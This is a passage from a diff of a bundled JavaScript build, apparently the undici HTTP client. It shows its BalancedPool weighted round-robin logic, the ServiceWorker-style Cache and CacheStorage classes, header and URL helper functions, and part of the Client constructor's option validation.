(typeof factory !== 'function') { + throw new InvalidArgumentError('factory must be a function.') + } + + this[kInterceptors] = opts.interceptors && opts.interceptors.BalancedPool && Array.isArray(opts.interceptors.BalancedPool) + ? opts.interceptors.BalancedPool + : [] + this[kFactory] = factory + + for (const upstream of upstreams) { + this.addUpstream(upstream) + } + this._updateBalancedPoolStats() + } + + addUpstream (upstream) { + const upstreamOrigin = parseOrigin(upstream).origin + + if (this[kClients].find((pool) => ( + pool[kUrl].origin === upstreamOrigin && + pool.closed !== true && + pool.destroyed !== true + ))) { + return this + } + const pool = this[kFactory](upstreamOrigin, Object.assign({}, this[kOptions])) + + this[kAddClient](pool) + pool.on('connect', () => { + pool[kWeight] = Math.min(this[kMaxWeightPerServer], pool[kWeight] + this[kErrorPenalty]) + }) + + pool.on('connectionError', () => { + pool[kWeight] = Math.max(1, pool[kWeight] - this[kErrorPenalty]) + this._updateBalancedPoolStats() + }) + + pool.on('disconnect', (...args) => { + const err = args[2] + if (err && err.code === 'UND_ERR_SOCKET') { + // decrease the weight of the pool. + pool[kWeight] = Math.max(1, pool[kWeight] - this[kErrorPenalty]) + this._updateBalancedPoolStats() + } + }) + + for (const client of this[kClients]) { + client[kWeight] = this[kMaxWeightPerServer] + } + + this._updateBalancedPoolStats() + + return this + } + + _updateBalancedPoolStats () { + this[kGreatestCommonDivisor] = this[kClients].map(p => p[kWeight]).reduce(getGreatestCommonDivisor, 0) + } + + removeUpstream (upstream) { + const upstreamOrigin = parseOrigin(upstream).origin + + const pool = this[kClients].find((pool) => ( + pool[kUrl].origin === upstreamOrigin && + pool.closed !== true && + pool.destroyed !== true + )) + + if (pool) { + this[kRemoveClient](pool) + } + + return this + } + + get upstreams () { + return this[kClients] + .filter(dispatcher => dispatcher.closed !== true && dispatcher.destroyed !== true) + .map((p) => p[kUrl].origin) + } + + [kGetDispatcher] () { + // We validate that pools is greater than 0, + // otherwise we would have to wait until an upstream + // is added, which might never happen. + if (this[kClients].length === 0) { + throw new BalancedPoolMissingUpstreamError() + } + + const dispatcher = this[kClients].find(dispatcher => ( + !dispatcher[kNeedDrain] && + dispatcher.closed !== true && + dispatcher.destroyed !== true + )) + + if (!dispatcher) { + return + } + + const allClientsBusy = this[kClients].map(pool => pool[kNeedDrain]).reduce((a, b) => a && b, true) + + if (allClientsBusy) { + return + } + + let counter = 0 + + let maxWeightIndex = this[kClients].findIndex(pool => !pool[kNeedDrain]) + + while (counter++ < this[kClients].length) { + this[kIndex] = (this[kIndex] + 1) % this[kClients].length + const pool = this[kClients][this[kIndex]] + + // find pool index with the largest weight + if (pool[kWeight] > this[kClients][maxWeightIndex][kWeight] && !pool[kNeedDrain]) { + maxWeightIndex = this[kIndex] + } + + // decrease the current weight every `this[kClients].length`. + if (this[kIndex] === 0) { + // Set the current weight to the next lower weight. + this[kCurrentWeight] = this[kCurrentWeight] - this[kGreatestCommonDivisor] + + if (this[kCurrentWeight] <= 0) { + this[kCurrentWeight] = this[kMaxWeightPerServer] + } + } + if (pool[kWeight] >= this[kCurrentWeight] && (!pool[kNeedDrain])) { + return pool + } + } + + this[kCurrentWeight] = this[kClients][maxWeightIndex][kWeight] + this[kIndex] = maxWeightIndex + return this[kClients][maxWeightIndex] + } +} + +module.exports = BalancedPool + + +/***/ }), + +/***/ 6101: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { kConstruct } = __nccwpck_require__(9174) +const { urlEquals, fieldValues: getFieldValues } = __nccwpck_require__(2396) +const { kEnumerableProperty, isDisturbed } = __nccwpck_require__(3983) +const { kHeadersList } = __nccwpck_require__(2785) +const { webidl } = __nccwpck_require__(1744) +const { Response, cloneResponse } = __nccwpck_require__(7823) +const { Request } = __nccwpck_require__(8359) +const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) +const { fetching } = __nccwpck_require__(4881) +const { urlIsHttpHttpsScheme, createDeferredPromise, readAllBytes } = __nccwpck_require__(2538) +const assert = __nccwpck_require__(9491) +const { getGlobalDispatcher } = __nccwpck_require__(1892) + +/** + * @see https://w3c.github.io/ServiceWorker/#dfn-cache-batch-operation + * @typedef {Object} CacheBatchOperation + * @property {'delete' | 'put'} type + * @property {any} request + * @property {any} response + * @property {import('../../types/cache').CacheQueryOptions} options + */ + +/** + * @see https://w3c.github.io/ServiceWorker/#dfn-request-response-list + * @typedef {[any, any][]} requestResponseList + */ + +class Cache { + /** + * @see https://w3c.github.io/ServiceWorker/#dfn-relevant-request-response-list + * @type {requestResponseList} + */ + #relevantRequestResponseList + + constructor () { + if (arguments[0] !== kConstruct) { + webidl.illegalConstructor() + } + + this.#relevantRequestResponseList = arguments[1] + } + + async match (request, options = {}) { + webidl.brandCheck(this, Cache) + webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.match' }) + + request = webidl.converters.RequestInfo(request) + options = webidl.converters.CacheQueryOptions(options) + + const p = await this.matchAll(request, options) + + if (p.length === 0) { + return + } + + return p[0] + } + + async matchAll (request = undefined, options = {}) { + webidl.brandCheck(this, Cache) + + if (request !== undefined) request = webidl.converters.RequestInfo(request) + options = webidl.converters.CacheQueryOptions(options) + + // 1. + let r = null + + // 2. + if (request !== undefined) { + if (request instanceof Request) { + // 2.1.1 + r = request[kState] + + // 2.1.2 + if (r.method !== 'GET' && !options.ignoreMethod) { + return [] + } + } else if (typeof request === 'string') { + // 2.2.1 + r = new Request(request)[kState] + } + } + + // 5. + // 5.1 + const responses = [] + + // 5.2 + if (request === undefined) { + // 5.2.1 + for (const requestResponse of this.#relevantRequestResponseList) { + responses.push(requestResponse[1]) + } + } else { // 5.3 + // 5.3.1 + const requestResponses = this.#queryCache(r, options) + + // 5.3.2 + for (const requestResponse of requestResponses) { + responses.push(requestResponse[1]) + } + } + + // 5.4 + // We don't implement CORs so we don't need to loop over the responses, yay! + + // 5.5.1 + const responseList = [] + + // 5.5.2 + for (const response of responses) { + // 5.5.2.1 + const responseObject = new Response(response.body?.source ?? null) + const body = responseObject[kState].body + responseObject[kState] = response + responseObject[kState].body = body + responseObject[kHeaders][kHeadersList] = response.headersList + responseObject[kHeaders][kGuard] = 'immutable' + + responseList.push(responseObject) + } + + // 6. + return Object.freeze(responseList) + } + + async add (request) { + webidl.brandCheck(this, Cache) + webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.add' }) + + request = webidl.converters.RequestInfo(request) + + // 1. + const requests = [request] + + // 2. + const responseArrayPromise = this.addAll(requests) + + // 3. + return await responseArrayPromise + } + + async addAll (requests) { + webidl.brandCheck(this, Cache) + webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.addAll' }) + + requests = webidl.converters['sequence'](requests) + + // 1. + const responsePromises = [] + + // 2. + const requestList = [] + + // 3. + for (const request of requests) { + if (typeof request === 'string') { + continue + } + + // 3.1 + const r = request[kState] + + // 3.2 + if (!urlIsHttpHttpsScheme(r.url) || r.method !== 'GET') { + throw webidl.errors.exception({ + header: 'Cache.addAll', + message: 'Expected http/s scheme when method is not GET.' + }) + } + } + + // 4. + /** @type {ReturnType[]} */ + const fetchControllers = [] + + // 5. + for (const request of requests) { + // 5.1 + const r = new Request(request)[kState] + + // 5.2 + if (!urlIsHttpHttpsScheme(r.url)) { + throw webidl.errors.exception({ + header: 'Cache.addAll', + message: 'Expected http/s scheme.' + }) + } + + // 5.4 + r.initiator = 'fetch' + r.destination = 'subresource' + + // 5.5 + requestList.push(r) + + // 5.6 + const responsePromise = createDeferredPromise() + + // 5.7 + fetchControllers.push(fetching({ + request: r, + dispatcher: getGlobalDispatcher(), + processResponse (response) { + // 1. + if (response.type === 'error' || response.status === 206 || response.status < 200 || response.status > 299) { + responsePromise.reject(webidl.errors.exception({ + header: 'Cache.addAll', + message: 'Received an invalid status code or the request failed.' + })) + } else if (response.headersList.contains('vary')) { // 2. + // 2.1 + const fieldValues = getFieldValues(response.headersList.get('vary')) + + // 2.2 + for (const fieldValue of fieldValues) { + // 2.2.1 + if (fieldValue === '*') { + responsePromise.reject(webidl.errors.exception({ + header: 'Cache.addAll', + message: 'invalid vary field value' + })) + + for (const controller of fetchControllers) { + controller.abort() + } + + return + } + } + } + }, + processResponseEndOfBody (response) { + // 1. + if (response.aborted) { + responsePromise.reject(new DOMException('aborted', 'AbortError')) + return + } + + // 2. + responsePromise.resolve(response) + } + })) + + // 5.8 + responsePromises.push(responsePromise.promise) + } + + // 6. + const p = Promise.all(responsePromises) + + // 7. + const responses = await p + + // 7.1 + const operations = [] + + // 7.2 + let index = 0 + + // 7.3 + for (const response of responses) { + // 7.3.1 + /** @type {CacheBatchOperation} */ + const operation = { + type: 'put', // 7.3.2 + request: requestList[index], // 7.3.3 + response // 7.3.4 + } + + operations.push(operation) // 7.3.5 + + index++ // 7.3.6 + } + + // 7.5 + const cacheJobPromise = createDeferredPromise() + + // 7.6.1 + let errorData = null + + // 7.6.2 + try { + this.#batchCacheOperations(operations) + } catch (e) { + errorData = e + } + + // 7.6.3 + queueMicrotask(() => { + // 7.6.3.1 + if (errorData === null) { + cacheJobPromise.resolve(undefined) + } else { + // 7.6.3.2 + cacheJobPromise.reject(errorData) + } + }) + + // 7.7 + return cacheJobPromise.promise + } + + async put (request, response) { + webidl.brandCheck(this, Cache) + webidl.argumentLengthCheck(arguments, 2, { header: 'Cache.put' }) + + request = webidl.converters.RequestInfo(request) + response = webidl.converters.Response(response) + + // 1. + let innerRequest = null + + // 2. + if (request instanceof Request) { + innerRequest = request[kState] + } else { // 3. + innerRequest = new Request(request)[kState] + } + + // 4. + if (!urlIsHttpHttpsScheme(innerRequest.url) || innerRequest.method !== 'GET') { + throw webidl.errors.exception({ + header: 'Cache.put', + message: 'Expected an http/s scheme when method is not GET' + }) + } + + // 5. + const innerResponse = response[kState] + + // 6. + if (innerResponse.status === 206) { + throw webidl.errors.exception({ + header: 'Cache.put', + message: 'Got 206 status' + }) + } + + // 7. + if (innerResponse.headersList.contains('vary')) { + // 7.1. + const fieldValues = getFieldValues(innerResponse.headersList.get('vary')) + + // 7.2. + for (const fieldValue of fieldValues) { + // 7.2.1 + if (fieldValue === '*') { + throw webidl.errors.exception({ + header: 'Cache.put', + message: 'Got * vary field value' + }) + } + } + } + + // 8. + if (innerResponse.body && (isDisturbed(innerResponse.body.stream) || innerResponse.body.stream.locked)) { + throw webidl.errors.exception({ + header: 'Cache.put', + message: 'Response body is locked or disturbed' + }) + } + + // 9. + const clonedResponse = cloneResponse(innerResponse) + + // 10. + const bodyReadPromise = createDeferredPromise() + + // 11. + if (innerResponse.body != null) { + // 11.1 + const stream = innerResponse.body.stream + + // 11.2 + const reader = stream.getReader() + + // 11.3 + readAllBytes(reader).then(bodyReadPromise.resolve, bodyReadPromise.reject) + } else { + bodyReadPromise.resolve(undefined) + } + + // 12. + /** @type {CacheBatchOperation[]} */ + const operations = [] + + // 13. + /** @type {CacheBatchOperation} */ + const operation = { + type: 'put', // 14. + request: innerRequest, // 15. + response: clonedResponse // 16. + } + + // 17. + operations.push(operation) + + // 19. + const bytes = await bodyReadPromise.promise + + if (clonedResponse.body != null) { + clonedResponse.body.source = bytes + } + + // 19.1 + const cacheJobPromise = createDeferredPromise() + + // 19.2.1 + let errorData = null + + // 19.2.2 + try { + this.#batchCacheOperations(operations) + } catch (e) { + errorData = e + } + + // 19.2.3 + queueMicrotask(() => { + // 19.2.3.1 + if (errorData === null) { + cacheJobPromise.resolve() + } else { // 19.2.3.2 + cacheJobPromise.reject(errorData) + } + }) + + return cacheJobPromise.promise + } + + async delete (request, options = {}) { + webidl.brandCheck(this, Cache) + webidl.argumentLengthCheck(arguments, 1, { header: 'Cache.delete' }) + + request = webidl.converters.RequestInfo(request) + options = webidl.converters.CacheQueryOptions(options) + + /** + * @type {Request} + */ + let r = null + + if (request instanceof Request) { + r = request[kState] + + if (r.method !== 'GET' && !options.ignoreMethod) { + return false + } + } else { + assert(typeof request === 'string') + + r = new Request(request)[kState] + } + + /** @type {CacheBatchOperation[]} */ + const operations = [] + + /** @type {CacheBatchOperation} */ + const operation = { + type: 'delete', + request: r, + options + } + + operations.push(operation) + + const cacheJobPromise = createDeferredPromise() + + let errorData = null + let requestResponses + + try { + requestResponses = this.#batchCacheOperations(operations) + } catch (e) { + errorData = e + } + + queueMicrotask(() => { + if (errorData === null) { + cacheJobPromise.resolve(!!requestResponses?.length) + } else { + cacheJobPromise.reject(errorData) + } + }) + + return cacheJobPromise.promise + } + + /** + * @see https://w3c.github.io/ServiceWorker/#dom-cache-keys + * @param {any} request + * @param {import('../../types/cache').CacheQueryOptions} options + * @returns {readonly Request[]} + */ + async keys (request = undefined, options = {}) { + webidl.brandCheck(this, Cache) + + if (request !== undefined) request = webidl.converters.RequestInfo(request) + options = webidl.converters.CacheQueryOptions(options) + + // 1. + let r = null + + // 2. + if (request !== undefined) { + // 2.1 + if (request instanceof Request) { + // 2.1.1 + r = request[kState] + + // 2.1.2 + if (r.method !== 'GET' && !options.ignoreMethod) { + return [] + } + } else if (typeof request === 'string') { // 2.2 + r = new Request(request)[kState] + } + } + + // 4. + const promise = createDeferredPromise() + + // 5. + // 5.1 + const requests = [] + + // 5.2 + if (request === undefined) { + // 5.2.1 + for (const requestResponse of this.#relevantRequestResponseList) { + // 5.2.1.1 + requests.push(requestResponse[0]) + } + } else { // 5.3 + // 5.3.1 + const requestResponses = this.#queryCache(r, options) + + // 5.3.2 + for (const requestResponse of requestResponses) { + // 5.3.2.1 + requests.push(requestResponse[0]) + } + } + + // 5.4 + queueMicrotask(() => { + // 5.4.1 + const requestList = [] + + // 5.4.2 + for (const request of requests) { + const requestObject = new Request('https://a') + requestObject[kState] = request + requestObject[kHeaders][kHeadersList] = request.headersList + requestObject[kHeaders][kGuard] = 'immutable' + requestObject[kRealm] = request.client + + // 5.4.2.1 + requestList.push(requestObject) + } + + // 5.4.3 + promise.resolve(Object.freeze(requestList)) + }) + + return promise.promise + } + + /** + * @see https://w3c.github.io/ServiceWorker/#batch-cache-operations-algorithm + * @param {CacheBatchOperation[]} operations + * @returns {requestResponseList} + */ + #batchCacheOperations (operations) { + // 1. + const cache = this.#relevantRequestResponseList + + // 2. + const backupCache = [...cache] + + // 3. + const addedItems = [] + + // 4.1 + const resultList = [] + + try { + // 4.2 + for (const operation of operations) { + // 4.2.1 + if (operation.type !== 'delete' && operation.type !== 'put') { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'operation type does not match "delete" or "put"' + }) + } + + // 4.2.2 + if (operation.type === 'delete' && operation.response != null) { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'delete operation should not have an associated response' + }) + } + + // 4.2.3 + if (this.#queryCache(operation.request, operation.options, addedItems).length) { + throw new DOMException('???', 'InvalidStateError') + } + + // 4.2.4 + let requestResponses + + // 4.2.5 + if (operation.type === 'delete') { + // 4.2.5.1 + requestResponses = this.#queryCache(operation.request, operation.options) + + // TODO: the spec is wrong, this is needed to pass WPTs + if (requestResponses.length === 0) { + return [] + } + + // 4.2.5.2 + for (const requestResponse of requestResponses) { + const idx = cache.indexOf(requestResponse) + assert(idx !== -1) + + // 4.2.5.2.1 + cache.splice(idx, 1) + } + } else if (operation.type === 'put') { // 4.2.6 + // 4.2.6.1 + if (operation.response == null) { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'put operation should have an associated response' + }) + } + + // 4.2.6.2 + const r = operation.request + + // 4.2.6.3 + if (!urlIsHttpHttpsScheme(r.url)) { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'expected http or https scheme' + }) + } + + // 4.2.6.4 + if (r.method !== 'GET') { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'not get method' + }) + } + + // 4.2.6.5 + if (operation.options != null) { + throw webidl.errors.exception({ + header: 'Cache.#batchCacheOperations', + message: 'options must not be defined' + }) + } + + // 4.2.6.6 + requestResponses = this.#queryCache(operation.request) + + // 4.2.6.7 + for (const requestResponse of requestResponses) { + const idx = cache.indexOf(requestResponse) + assert(idx !== -1) + + // 4.2.6.7.1 + cache.splice(idx, 1) + } + + // 4.2.6.8 + cache.push([operation.request, operation.response]) + + // 4.2.6.10 + addedItems.push([operation.request, operation.response]) + } + + // 4.2.7 + resultList.push([operation.request, operation.response]) + } + + // 4.3 + return resultList + } catch (e) { // 5. + // 5.1 + this.#relevantRequestResponseList.length = 0 + + // 5.2 + this.#relevantRequestResponseList = backupCache + + // 5.3 + throw e + } + } + + /** + * @see https://w3c.github.io/ServiceWorker/#query-cache + * @param {any} requestQuery + * @param {import('../../types/cache').CacheQueryOptions} options + * @param {requestResponseList} targetStorage + * @returns {requestResponseList} + */ + #queryCache (requestQuery, options, targetStorage) { + /** @type {requestResponseList} */ + const resultList = [] + + const storage = targetStorage ?? this.#relevantRequestResponseList + + for (const requestResponse of storage) { + const [cachedRequest, cachedResponse] = requestResponse + if (this.#requestMatchesCachedItem(requestQuery, cachedRequest, cachedResponse, options)) { + resultList.push(requestResponse) + } + } + + return resultList + } + + /** + * @see https://w3c.github.io/ServiceWorker/#request-matches-cached-item-algorithm + * @param {any} requestQuery + * @param {any} request + * @param {any | null} response + * @param {import('../../types/cache').CacheQueryOptions | undefined} options + * @returns {boolean} + */ + #requestMatchesCachedItem (requestQuery, request, response = null, options) { + // if (options?.ignoreMethod === false && request.method === 'GET') { + // return false + // } + + const queryURL = new URL(requestQuery.url) + + const cachedURL = new URL(request.url) + + if (options?.ignoreSearch) { + cachedURL.search = '' + + queryURL.search = '' + } + + if (!urlEquals(queryURL, cachedURL, true)) { + return false + } + + if ( + response == null || + options?.ignoreVary || + !response.headersList.contains('vary') + ) { + return true + } + + const fieldValues = getFieldValues(response.headersList.get('vary')) + + for (const fieldValue of fieldValues) { + if (fieldValue === '*') { + return false + } + + const requestValue = request.headersList.get(fieldValue) + const queryValue = requestQuery.headersList.get(fieldValue) + + // If one has the header and the other doesn't, or one has + // a different value than the other, return false + if (requestValue !== queryValue) { + return false + } + } + + return true + } +} + +Object.defineProperties(Cache.prototype, { + [Symbol.toStringTag]: { + value: 'Cache', + configurable: true + }, + match: kEnumerableProperty, + matchAll: kEnumerableProperty, + add: kEnumerableProperty, + addAll: kEnumerableProperty, + put: kEnumerableProperty, + delete: kEnumerableProperty, + keys: kEnumerableProperty +}) + +const cacheQueryOptionConverters = [ + { + key: 'ignoreSearch', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'ignoreMethod', + converter: webidl.converters.boolean, + defaultValue: false + }, + { + key: 'ignoreVary', + converter: webidl.converters.boolean, + defaultValue: false + } +] + +webidl.converters.CacheQueryOptions = webidl.dictionaryConverter(cacheQueryOptionConverters) + +webidl.converters.MultiCacheQueryOptions = webidl.dictionaryConverter([ + ...cacheQueryOptionConverters, + { + key: 'cacheName', + converter: webidl.converters.DOMString + } +]) + +webidl.converters.Response = webidl.interfaceConverter(Response) + +webidl.converters['sequence'] = webidl.sequenceConverter( + webidl.converters.RequestInfo +) + +module.exports = { + Cache +} + + +/***/ }), + +/***/ 7907: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { kConstruct } = __nccwpck_require__(9174) +const { Cache } = __nccwpck_require__(6101) +const { webidl } = __nccwpck_require__(1744) +const { kEnumerableProperty } = __nccwpck_require__(3983) + +class CacheStorage { + /** + * @see https://w3c.github.io/ServiceWorker/#dfn-relevant-name-to-cache-map + * @type {Map} + */ + async has (cacheName) { + webidl.brandCheck(this, CacheStorage) + webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.has' }) + + cacheName = webidl.converters.DOMString(cacheName) + + // 2.1.1 + // 2.2 + return this.#caches.has(cacheName) + } + + /** + * @see https://w3c.github.io/ServiceWorker/#dom-cachestorage-open + * @param {string} cacheName + * @returns {Promise} + */ + async open (cacheName) { + webidl.brandCheck(this, CacheStorage) + webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.open' }) + + cacheName = webidl.converters.DOMString(cacheName) + + // 2.1 + if (this.#caches.has(cacheName)) { + // await caches.open('v1') !== await caches.open('v1') + + // 2.1.1 + const cache = this.#caches.get(cacheName) + + // 2.1.1.1 + return new Cache(kConstruct, cache) + } + + // 2.2 + const cache = [] + + // 2.3 + this.#caches.set(cacheName, cache) + + // 2.4 + return new Cache(kConstruct, cache) + } + + /** + * @see https://w3c.github.io/ServiceWorker/#cache-storage-delete + * @param {string} cacheName + * @returns {Promise} + */ + async delete (cacheName) { + webidl.brandCheck(this, CacheStorage) + webidl.argumentLengthCheck(arguments, 1, { header: 'CacheStorage.delete' }) + + cacheName = webidl.converters.DOMString(cacheName) + + return this.#caches.delete(cacheName) + } + + /** + * @see https://w3c.github.io/ServiceWorker/#cache-storage-keys + * @returns {string[]} + */ + async keys () { + webidl.brandCheck(this, CacheStorage) + + // 2.1 + const keys = this.#caches.keys() + + // 2.2 + return [...keys] + } +} + +Object.defineProperties(CacheStorage.prototype, { + [Symbol.toStringTag]: { + value: 'CacheStorage', + configurable: true + }, + match: kEnumerableProperty, + has: kEnumerableProperty, + open: kEnumerableProperty, + delete: kEnumerableProperty, + keys: kEnumerableProperty +}) + +module.exports = { + CacheStorage +} + + +/***/ }), + +/***/ 9174: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +module.exports = { + kConstruct: (__nccwpck_require__(2785).kConstruct) +} + + +/***/ }), + +/***/ 2396: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const assert = __nccwpck_require__(9491) +const { URLSerializer } = __nccwpck_require__(685) +const { isValidHeaderName } = __nccwpck_require__(2538) + +/** + * @see https://url.spec.whatwg.org/#concept-url-equals + * @param {URL} A + * @param {URL} B + * @param {boolean | undefined} excludeFragment + * @returns {boolean} + */ +function urlEquals (A, B, excludeFragment = false) { + const serializedA = URLSerializer(A, excludeFragment) + + const serializedB = URLSerializer(B, excludeFragment) + + return serializedA === serializedB +} + +/** + * @see https://github.com/chromium/chromium/blob/694d20d134cb553d8d89e5500b9148012b1ba299/content/browser/cache_storage/cache_storage_cache.cc#L260-L262 + * @param {string} header + */ +function fieldValues (header) { + assert(header !== null) + + const values = [] + + for (let value of header.split(',')) { + value = value.trim() + + if (!value.length) { + continue + } else if (!isValidHeaderName(value)) { + continue + } + + values.push(value) + } + + return values +} + +module.exports = { + urlEquals, + fieldValues +} + + +/***/ }), + +/***/ 3598: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; +// @ts-check + + + +/* global WebAssembly */ + +const assert = __nccwpck_require__(9491) +const net = __nccwpck_require__(1808) +const http = __nccwpck_require__(3685) +const { pipeline } = __nccwpck_require__(2781) +const util = __nccwpck_require__(3983) +const timers = __nccwpck_require__(9459) +const Request = __nccwpck_require__(2905) +const DispatcherBase = __nccwpck_require__(4839) +const { + RequestContentLengthMismatchError, + ResponseContentLengthMismatchError, + InvalidArgumentError, + RequestAbortedError, + HeadersTimeoutError, + HeadersOverflowError, + SocketError, + InformationalError, + BodyTimeoutError, + HTTPParserError, + ResponseExceededMaxSizeError, + ClientDestroyedError +} = __nccwpck_require__(8045) +const buildConnector = __nccwpck_require__(2067) +const { + kUrl, + kReset, + kServerName, + kClient, + kBusy, + kParser, + kConnect, + kBlocking, + kResuming, + kRunning, + kPending, + kSize, + kWriting, + kQueue, + kConnected, + kConnecting, + kNeedDrain, + kNoRef, + kKeepAliveDefaultTimeout, + kHostHeader, + kPendingIdx, + kRunningIdx, + kError, + kPipelining, + kSocket, + kKeepAliveTimeoutValue, + kMaxHeadersSize, + kKeepAliveMaxTimeout, + kKeepAliveTimeoutThreshold, + kHeadersTimeout, + kBodyTimeout, + kStrictContentLength, + kConnector, + kMaxRedirections, + kMaxRequests, + kCounter, + kClose, + kDestroy, + kDispatch, + kInterceptors, + kLocalAddress, + kMaxResponseSize, + kHTTPConnVersion, + // HTTP2 + kHost, + kHTTP2Session, + kHTTP2SessionState, + kHTTP2BuildRequest, + kHTTP2CopyHeaders, + kHTTP1BuildRequest +} = __nccwpck_require__(2785) + +/** @type {import('http2')} */ +let http2 +try { + http2 = __nccwpck_require__(5158) +} catch { + // @ts-ignore + http2 = { constants: {} } +} + +const { + constants: { + HTTP2_HEADER_AUTHORITY, + HTTP2_HEADER_METHOD, + HTTP2_HEADER_PATH, + HTTP2_HEADER_SCHEME, + HTTP2_HEADER_CONTENT_LENGTH, + HTTP2_HEADER_EXPECT, + HTTP2_HEADER_STATUS + } +} = http2 + +// Experimental +let h2ExperimentalWarned = false + +const FastBuffer = Buffer[Symbol.species] + +const kClosedResolve = Symbol('kClosedResolve') + +const channels = {} + +try { + const diagnosticsChannel = __nccwpck_require__(7643) + channels.sendHeaders = diagnosticsChannel.channel('undici:client:sendHeaders') + channels.beforeConnect = diagnosticsChannel.channel('undici:client:beforeConnect') + channels.connectError = diagnosticsChannel.channel('undici:client:connectError') + channels.connected = diagnosticsChannel.channel('undici:client:connected') +} catch { + channels.sendHeaders = { hasSubscribers: false } + channels.beforeConnect = { hasSubscribers: false } + channels.connectError = { hasSubscribers: false } + channels.connected = { hasSubscribers: false } +} + +/** + * @type {import('../types/client').default} + */ +class Client extends DispatcherBase { + /** + * + * @param {string|URL} url + * @param {import('../types/client').Client.Options} options + */ + constructor (url, { + interceptors, + maxHeaderSize, + headersTimeout, + socketTimeout, + requestTimeout, + connectTimeout, + bodyTimeout, + idleTimeout, + keepAlive, + keepAliveTimeout, + maxKeepAliveTimeout, + keepAliveMaxTimeout, + keepAliveTimeoutThreshold, + socketPath, + pipelining, + tls, + strictContentLength, + maxCachedSessions, + maxRedirections, + connect, + maxRequestsPerClient, + localAddress, + maxResponseSize, + autoSelectFamily, + autoSelectFamilyAttemptTimeout, + // h2 + allowH2, + maxConcurrentStreams + } = {}) { + super() + + if (keepAlive !== undefined) { + throw new InvalidArgumentError('unsupported keepAlive, use pipelining=0 instead') + } + + if (socketTimeout !== undefined) { + throw new InvalidArgumentError('unsupported socketTimeout, use headersTimeout & bodyTimeout instead') + } + + if (requestTimeout !== undefined) { + throw new InvalidArgumentError('unsupported requestTimeout, use headersTimeout & bodyTimeout instead') + } + + if (idleTimeout !== undefined) { + throw new InvalidArgumentError('unsupported idleTimeout, use keepAliveTimeout instead') + } + + if (maxKeepAliveTimeout !== undefined) { + throw new InvalidArgumentError('unsupported maxKeepAliveTimeout, use keepAliveMaxTimeout instead') + } + + if (maxHeaderSize != null && !Number.isFinite(maxHeaderSize)) { + throw new InvalidArgumentError('invalid maxHeaderSize') + } + + if (socketPath != null && typeof socketPath !== 'string') { + throw new InvalidArgumentError('invalid socketPath') + } + + if (connectTimeout != null && (!Number.isFinite(connectTimeout) || connectTimeout < 0)) { + throw new InvalidArgumentError('invalid connectTimeout') + } + + if (keepAliveTimeout != null && (!Number.isFinite(keepAliveTimeout) || keepAliveTimeout <= 0)) { + throw new InvalidArgumentError('invalid keepAliveTimeout') + } + + if (keepAliveMaxTimeout != null && (!Number.isFinite(keepAliveMaxTimeout) || keepAliveMaxTimeout <= 0)) { + throw new InvalidArgumentError('invalid keepAliveMaxTimeout') + } + + if (keepAliveTimeoutThreshold != null && !Number.isFinite(keepAliveTimeoutThreshold)) { + throw new InvalidArgumentError('invalid keepAliveTimeoutThreshold') + } + + if (headersTimeout != null && (!Number.isInteger(headersTimeout) || headersTimeout < 0)) { + throw new InvalidArgumentError('headersTimeout must be a positive integer or zero') + } + + if (bodyTimeout != null && (!Number.isInteger(bodyTimeout) || bodyTimeout < 0)) { + throw new InvalidArgumentError('bodyTimeout must be a positive integer or zero') + } + + if (connect != null && typeof connect !== 'function' && typeof connect !== 'object') { + throw new InvalidArgumentError('connect must be a function or an object') + } + + if (maxRedirections != null && (!Number.isInteger(maxRedirections) || maxRedirections < 0)) { + throw new InvalidArgumentError('maxRedirections must be a positive number') + } + + if (maxRequestsPerClient != null && (!Number.isInteger(maxRequestsPerClient) || maxRequestsPerClient < 0)) { + throw new InvalidArgumentError('maxRequestsPerClient must be a positive number') + } + + if (localAddress != null && (typeof localAddress !== 'string' || net.isIP(localAddress) === 0)) { + throw new InvalidArgumentError('localAddress must be valid string IP address') + } + + if (maxResponseSize != null && (!Number.isInteger(maxResponseSize) || maxResponseSize < -1)) { + throw new InvalidArgumentError('maxResponseSize must be a positive number') + } + + if ( + autoSelectFamilyAttemptTimeout != null && + (!Number.isInteger(autoSelectFamilyAttemptTimeout) || autoSelectFamilyAttemptTimeout < -1) + ) { + throw new InvalidArgumentError('autoSelectFamilyAttemptTimeout must be a positive number') + } + + // h2 + if (allowH2 != null && typeof allowH2 !== 'boolean') { + throw new InvalidArgumentError('allowH2 must be a valid boolean value') + } + + if (maxConcurrentStreams != null && (typeof maxConcurrentStreams !== 'number' || maxConcurrentStreams < 1)) { + throw new InvalidArgumentError('maxConcurrentStreams must be a possitive integer, greater than 0') + } + + if (typeof connect !== 'function') { + connect = buildConnector({ + ...tls, + maxCachedSessions, + allowH2, + socketPath, + timeout: connectTimeout, + ...(util.nodeHasAutoSelectFamily && autoSelectFamily ? { autoSelectFamily, autoSelectFamilyAttemptTimeout } : undefined), + ...connect + }) + } + + this[kInterceptors] = interceptors && interceptors.Client && Array.isArray(interceptors.Client) + ? interceptors.Client + : [createRedirectInterceptor({ maxRedirections })] + this[kUrl] = util.parseOrigin(url) + this[kConnector] = connect + this[kSocket] = null + this[kPipelining] = pipelining != null ? pipelining : 1 + this[kMaxHeadersSize] = maxHeaderSize || http.maxHeaderSize + this[kKeepAliveDefaultTimeout] = keepAliveTimeout == null ? 4e3 : keepAliveTimeout + this[kKeepAliveMaxTimeout] = keepAliveMaxTimeout == null ? 600e3 : keepAliveMaxTimeout + 